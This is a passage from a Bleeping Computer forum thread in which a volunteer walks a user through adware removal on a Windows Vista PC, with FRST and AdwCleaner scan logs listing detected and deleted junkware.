2015-04-02 18:54 - 2015-02-21 12:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 01803264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-04-02 18:54 - 2015-02-21 12:18 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-04-02 18:54 - 2015-02-21 12:17 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-04-02 14:13 - 2015-04-02 18:05 - 00000000 ____D () C:\AdwCleaner
2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-12 20:55 - 2010-06-11 20:52 - 00000000 ____D () C:\Users\Angel\Tracing
2015-04-12 20:54 - 2014-09-29 09:15 - 00000644 _____ () C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-04-12 20:54 - 2014-09-29 09:00 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-12 20:54 - 2009-02-09 18:08 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2015-04-12 20:54 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-04-12 20:54 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-04-12 20:54 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-04-12 20:53 - 2006-11-02 08:01 - 00032550 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-04-12 20:42 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\rescache
2015-04-12 20:34 - 2006-11-02 05:33 - 00747142 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-04-12 20:26 - 2006-11-02 07:37 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-04-12 20:26 - 2006-11-02 06:18 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-12 20:13 - 2014-09-29 09:07 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-04-12 20:09 - 2012-04-28 13:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\Program Files\iTunes
2015-04-11 22:50 - 2009-02-17 14:53 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-04-11 22:43 - 2015-02-09 21:19 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-04-06 12:54 - 2009-08-31 22:05 - 00000000 ____D () C:\Users\Angel\Documents\BANK STUFF
2015-04-02 21:34 - 2014-12-08 16:18 - 00000000 ____D () C:\Program Files\Steam
2015-04-02 21:34 - 2010-05-07 11:04 - 00000000 ____D () C:\Windows\Minidump
2015-04-02 21:34 - 2009-09-21 11:48 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Media Player Classic
2015-04-02 21:34 - 2008-02-03 18:07 - 00000000 ____D () C:\Windows\Panther
2015-04-02 19:59 - 2014-09-29 09:15 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-04-02 19:54 - 2006-11-02 07:47 - 00374064 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-04-02 19:50 - 2009-02-17 14:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-04-02 19:48 - 2013-07-12 17:46 - 00000000 ____D () C:\Windows\system32\MRT
2015-04-02 19:41 - 2006-11-02 05:24 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-04-02 19:37 - 2015-02-19 22:52 - 00000000 ____D () C:\Program Files\iPod(68)
2015-04-02 19:37 - 2014-09-21 20:39 - 00000000 ____D () C:\Program Files\LPT
2015-04-02 19:37 - 2014-09-21 20:38 - 00000000 ____D () C:\Users\Angel\AppData\Local\LPT
2015-04-02 19:33 - 2015-01-27 17:54 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StormWatch
2015-04-02 19:33 - 2015-01-27 17:54 - 00000000 ____D () C:\Users\Angel\AppData\Local\StormWatch
2015-04-02 19:33 - 2015-01-27 17:54 - 00000000 ____D () C:\Program Files\StormWatch
2015-04-02 19:13 - 2015-02-16 13:17 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb
2015-04-02 18:45 - 2014-09-29 09:01 - 00002085 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-02 18:36 - 2009-02-16 19:37 - 00000000 ____D () C:\Users\Angel
2015-04-02 18:36 - 2006-11-02 05:22 - 58720256 _____ () C:\Windows\system32\config\software_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 44564480 _____ () C:\Windows\system32\config\components_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 41943040 _____ () C:\Windows\system32\config\system_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 05242880 _____ () C:\Windows\system32\config\default_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\security_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\sam_previous
2015-04-02 18:34 - 2014-12-10 21:10 - 00000000 ____D () C:\Users\Angel\AppData\Local\23897
2015-04-02 18:34 - 2014-12-03 23:05 - 00000000 ____D () C:\Users\Angel\AppData\Local\4657
2015-04-02 18:34 - 2014-12-01 20:28 - 00000000 ____D () C:\Users\Angel\AppData\Local\32244
2015-04-02 18:34 - 2014-11-17 14:18 - 00000000 ____D () C:\Program Files\Shop For Rewards
2015-04-02 18:34 - 2014-09-29 09:07 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-04-02 18:34 - 2014-09-29 09:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-04-02 18:34 - 2014-09-25 15:58 - 00000000 ____D () C:\Users\Public\518FC3555F9246E4AC8055FCEF3883E5
2015-04-02 18:34 - 2014-09-23 14:35 - 00000000 ____D () C:\ProgramData\Browser
2015-04-02 18:34 - 2014-09-17 15:32 - 00000000 ____D () C:\Users\Public\B4D0DA65314B4041838806CA0CC88B7B
2015-04-02 18:34 - 2014-08-08 21:24 - 00000000 ____D () C:\Program Files\Driver Pro
2015-04-02 18:34 - 2014-08-03 18:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
2015-04-02 18:34 - 2014-07-22 15:06 - 00000000 ____D () C:\ProgramData\76e44fa5fad02a2d
2015-04-02 18:34 - 2013-07-12 20:48 - 00000000 ____D () C:\Program Files\AskPartnerNetwork
2015-04-02 18:34 - 2010-08-26 16:30 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\.BitTornado
2015-04-02 18:34 - 2009-10-06 10:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2015-04-02 18:34 - 2009-10-06 10:43 - 00000000 ____D () C:\Program Files\Coupons
2015-04-02 18:34 - 2009-09-21 12:05 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\vlc
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\ProgramData\NOS
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\Program Files\NOS
2015-04-02 18:34 - 2009-02-18 15:22 - 00000000 ____D () C:\Users\Angel\Desktop\Iconotopia
2015-04-02 18:34 - 2009-02-17 16:46 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-04-02 18:34 - 2009-02-17 15:25 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-04-02 18:34 - 2009-02-17 14:20 - 00000000 ____D () C:\Users\Angel\AppData\Local\Microsoft Help
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 __RSD () C:\Windows\Media
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\spool
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\Msdtc
2015-04-02 18:33 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\registration
2015-04-02 17:53 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\schemas
 
==================== Files in the root of some directories =======
 
2014-08-04 18:04 - 2014-08-04 18:04 - 0000046 _____ () C:\Users\Angel\AppData\Roaming\WB.CFG
2009-02-17 13:32 - 2014-07-29 09:05 - 0007052 _____ () C:\Users\Angel\AppData\Local\d3d9caps.dat
2009-03-03 16:39 - 2012-09-17 20:20 - 0006656 _____ () C:\Users\Angel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-02-17 15:05 - 2009-02-17 15:05 - 0008248 _____ () C:\Users\Angel\AppData\Local\en.ini
2009-02-17 16:51 - 2009-02-17 16:51 - 0000093 _____ () C:\Users\Angel\AppData\Local\fusioncache.dat
2009-02-17 16:00 - 2009-02-17 16:48 - 0003386 _____ () C:\ProgramData\hpzinstall.log
 
Some content of TEMP:
====================
C:\Users\Angel\AppData\Local\Temp\ReimagePackage.exe
C:\Users\Angel\AppData\Local\Temp\ReiSysUpdate.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-04-12 21:01
 
==================== End Of Log ============================

Attached Files



BC AdBot (Login to Remove)

 


m

#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 13 April 2015 - 02:37 AM

Hi & :welcome: to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems. :warrior:

Before we move on, please read the following points carefully: :exclame:

  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.

Step 1

  • Please download and install revouninstaller.pngRevo Uninstaller Free
    note: there is no need to click anything on that page, the download will start automatically
  • Double click Revo Uninstaller to run it
  • From the list of programs double click on the listed program(s) to remove it:
    Coupon Printer for Windows
    Reimage Repair
    Shopping Helper Smartbar
    Shopping Helper Smartbar Engin
  • When prompted if you want to uninstall click Yes
  • Be sure the Moderate option is selected then click Next
  • The program will run, If prompted again click Yes
  • When the built-in uninstaller is finished click on Next
  • Once the program has searched for leftovers click Next
  • Check the items in bold only on the list then click Delete
    note: you may have to expand some folders by clicking the "+" mark
  • When prompted click on Yes and then on Next
  • Put a check on any folders that are found and select Delete
  • When prompted select Yes then Next
  • Once done click Finish

Step 2

Scan with adwcleaner.png AdwCleaner (by Xplode).

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select "Run As Administrator"
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • After rebooting, a log file (that is saved in C:\AdwCleaner[S#].txt) will open automatically.
    Copy and paste the contents of that logfile in your next reply.

Step 3

v21logo.PNG

Please download and install Malwarebytes Anti-Malware.(NEW VERSION!)

  • Please open Malwarebytes Anti-Malware and update the database.
  • Click "Settings" [1] and go to "Detection and Protection" [2]
  • Make sure "Scan for Rootkits" is checked.
  • Click on Dashboard [3], then click on Scan Now [4] to start the scan.
    :exclame: If Malware or Potentially Unwanted Programs [PUPs] are found, you will receive a prompt:
    m21p.png
  • Click on "Remove Selected" [5].
  • Then click "Save Results" [6] and select
    m21p4.png
  • Return to our forum. Paste your log into your next reply and then click Finish [7].

mbamv21.gif

Step 4

frst.pngfrstscan.png

Start FRST with administator privileges.

  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#3 SereneSnake

SereneSnake
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:30 AM

Posted 13 April 2015 - 03:30 PM

Hello! Thank you for the quick response and detailed instructions. I hope I followed them correctly.

 

# AdwCleaner v4.200 - Logfile created 02/04/2015 at 14:14:40
# Updated 29/03/2015 by Xplode
# Database : 2015-03-29.1 [Local]
# Operating system : Windows Vista ™ Home Premium Service Pack 2 (x86)
# Username : Angel - ANGEL-PC
# Running from : C:\Users\Angel\Downloads\adwcleaner_4.200.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : netfilter
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\apn
Folder Deleted : C:\ProgramData\Browser
Folder Deleted : C:\ProgramData\Systweak
Folder Deleted : C:\ProgramData\Reimage Protector
Folder Deleted : C:\ProgramData\SaveerPro
Folder Deleted : C:\ProgramData\SaverAdddon
Folder Deleted : C:\ProgramData\saveROn
Folder Deleted : C:\ProgramData\76e44fa5fad02a2d
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Deleted : C:\Program Files\AskPartnerNetwork
Folder Deleted : C:\Program Files\Driver Pro
Folder Deleted : C:\Program Files\globalUpdate
Folder Deleted : C:\Program Files\LPT
Folder Deleted : C:\Program Files\predm
Folder Deleted : C:\Program Files\Reimage
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\Program Files\Universal Updater
Folder Deleted : C:\Program Files\Elex-tech
Folder Deleted : C:\Program Files\Krab Web
Folder Deleted : C:\Program Files\Coupons
Folder Deleted : C:\Program Files\SaveerPro
Folder Deleted : C:\Program Files\SaverAdddon
Folder Deleted : C:\Program Files\saveROn
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\apn
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\iSafeRightKeyScan
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\Krab Web
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\Deal Keeper
Folder Deleted : C:\Users\Angel\AppData\Local\globalUpdate
Folder Deleted : C:\Users\Angel\AppData\Local\LPT
Folder Deleted : C:\Users\Angel\AppData\Roaming\eCyber
Folder Deleted : C:\Users\Angel\AppData\Roaming\Systweak
Folder Deleted : C:\Users\Angel\AppData\Roaming\Elex-tech
Folder Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu
Folder Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org
Folder Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}
File Deleted : C:\Windows\Reimage.ini
File Deleted : C:\Windows\system32\drivers\netfilter.sys
File Deleted : C:\Program Files\Mozilla Firefox\components\AskSearch.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\invalidprefs.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\ask-search.xml
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\web-search.xml
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\user.js
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_plarium.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_plarium.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.safefinder.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.safefinder.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.snapdo.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.snapdo.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_uk.ask.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.ask.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.ask.com_0.localstorage-journal
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla
Key Deleted : HKLM\SOFTWARE\Classes\Conduit.Engine
Key Deleted : HKLM\SOFTWARE\Classes\speedupmypc
Key Deleted : HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Update Krab Web
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Util Krab Web
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT2418376
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{787D3F9B-69C6-427C-BF55-4419F932474A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D52F7CE0-A4BA-4220-A907-444CB6158A09}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5075DFCC-F3F5-4B15-B364-270BC7C585AD}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{895F78F3-9620-49AD-8AA8-E6802E5AC64E}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{0902EBD9-C5B4-4400-8CF1-7ACA8E8805D9}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EEE6C35D-6118-11DC-9C72-001320C79847}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKCU\Software\Driver Pro
Key Deleted : HKCU\Software\PennyBee
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKLM\SOFTWARE\TBID
Key Deleted : HKLM\SOFTWARE\SPPDCOM
Key Deleted : HKLM\SOFTWARE\Elex-tech
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Reimage Protector
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows4.0
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C64BEB42-B25D-4674-BB55-4099CB720110}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}_is1
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{BC0BF363-63AB-4FF7-8EF1-AE0D7F711B24}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\conduitEngine
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\iSafe
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\MyPC Backup
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\RocketTab
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\TVWizard
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Salus
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Reimage Protector
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Coupon Printer for Windows4.0
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{C64BEB42-B25D-4674-BB55-4099CB720110}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Krab Web
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\5E8031606EB60A64C882918F8FF38DD4
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\safefinder.com
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - <-loopback>
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - hxxp=127.0.0.1:49172;hxxps=127.0.0.1:49172
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16633
 
 
-\\ Mozilla Firefox v
 
 
-\\ Google Chrome v41.0.2272.101
 
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://movies.netflix.com/WiSearch?raw_query=&ac_category_type=none&ac_rel_posn=-1&ac_abs_posn=-1&v1={searchTerms}&search_submit=
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.snapdo.com/?q={searchTerms}&category=Web&publisher=outbrowse&country=us&feedid=infospace&st=dn&dpid=us&lan=en&start=1
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3331457&octid=EB_ORIGINAL_CTID&ISID=ME1FC3FAD-3B46-4CE1-AA60-5D5A354F60F6&SearchSource=58&CUI=&UM=6&UP=SP5D0B0B4F-0DC0-4710-8CDE-E0F8CDF5FDBD&q={searchTerms}&SSPV=
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://en.softonic.com/s/{searchTerms}
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_coinis_15_13&cd=2XzuyEtN2Y1L1QzutDtDtBtCzy0BtByDyEzz0DyDyCyD0DtDtN0D0Tzu0StCtCzztBtN1L2XzutAtFzztFtAtFtCtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StDyDtAtB0Bzy0CtDtGtB0Fzy0AtGtBtDyEyCtG0EzyyC0DtGyE0DyBtAyB0CyB0E0DyC0DyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0CtByE0BtDzytDyDtG0F0C0DyDtGyEtB0EtBtG0AtC0A0CtGtC0F0A0FtDtB0F0D0F0EyCyB2QtN1B2Z1V1T1S1NzuyCtAyB&cr=1070897748&ir=
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : blmchfpimpbbdmgpcieclabeafkljbhm
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : dndlcbaomdoggooaficldplkcmkfpgff
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : elggllhppljlljkgfeokjpehmdamkejk
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Default_Search_Provider_Data] : 
 
*************************
 
AdwCleaner[R0].txt - [18084 bytes] - [02/04/2015 14:13:29]
AdwCleaner[S0].txt - [11478 bytes] - [02/04/2015 14:14:40]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [11538  bytes] ##########
# AdwCleaner v4.201 - Logfile created 13/04/2015 at 14:34:33
# Updated 08/04/2015 by Xplode
# Database : 2015-04-08.1 [Local]
# Operating system : Windows Vista ™ Home Premium Service Pack 2 (x86)
# Username : Angel - ANGEL-PC
# Running from : C:\Users\Angel\Downloads\adwcleaner_4.201.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : netfilter
[#] Service Deleted : ReimageRealTimeProtector
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\rei
Folder Deleted : C:\ProgramData\Browser
Folder Deleted : C:\ProgramData\Reimage Protector
Folder Deleted : C:\ProgramData\76e44fa5fad02a2d
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
